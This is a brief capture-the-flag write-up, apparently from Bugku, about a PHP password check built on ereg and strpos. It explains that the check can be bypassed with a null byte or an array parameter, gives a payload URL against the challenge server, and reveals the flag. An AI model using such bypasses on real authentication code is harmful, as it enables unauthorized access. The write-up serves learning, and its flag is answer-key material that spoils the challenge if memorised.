<?php $flag = "flag"; if (isset ($_GET['password'])) { if (ereg ("^[a-zA-Z0-9]+$", $_GET['password']) === FALSE) echo 'You password must be alphanumeric'; else if (strpos ($_GET['password'], '--') !== FALSE) die('Flag: ' . $flag); else echo 'Invalid password'; } ?>
ereg can be used to cut 00%
strpos truncated with an array, or null
payload
http://123.206.87.240:9009/19.php?password[]=1
PHP language is weak, more sensitive array
Flag: flag{ctf-bugku-ad-2131212}